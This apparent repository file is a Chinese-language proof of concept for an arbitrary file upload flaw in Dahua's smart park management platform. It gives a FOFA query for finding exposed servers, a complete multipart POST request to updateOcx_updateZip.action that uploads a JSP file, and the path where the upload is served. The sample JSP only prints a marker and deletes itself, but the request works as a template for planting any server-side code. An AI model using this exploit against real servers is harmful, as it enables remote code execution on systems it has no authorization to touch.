POC/wpoc/大华/大华智慧园区系统updateOcx_updateZip.action存在任意文件上传漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

41 lines
1.3 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 大华智慧园区系统updateOcx_updateZip.action存在任意文件上传漏洞
大华智慧园区系统updateOcx_updateZip.action存在任意文件上传漏洞允许攻击者上传恶意文件到服务器可能导致远程代码执行、网站篡改或其他形式的攻击严重威胁系统和数据安全。
## fofa
```javascript
app="dahua-智慧园区综合管理平台"
```
## poc
```java
POST /portal/updateOcx_updateZip.action HTTP/1.1
Host: xx.xx.xx.xx
Accept-Encoding: identity
Content-Length: 431
Accept-Language: zh-CN,zh;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Referer: http://www.baidu.com
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=9aa1b50e33144fb18837cc97ed863df7
--9aa1b50e33144fb18837cc97ed863df7
Content-Disposition: form-data; name="updateBean.compressFileName"
KgJrYe.jsp
--9aa1b50e33144fb18837cc97ed863df7
Content-Disposition: form-data; name="updateBean.compress"; filename="KgJrYe.jsp"
Content-Type: text/plain
<% out.println(32461+18843+"eiaDXmEZEvlnjVVz");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--9aa1b50e33144fb18837cc97ed863df7-
```
文件地址 20240801102132 文件上传时间戳
`http://xx.xx.xx.xx/portal/ocx/20240801102132/KgJrYe.jsp`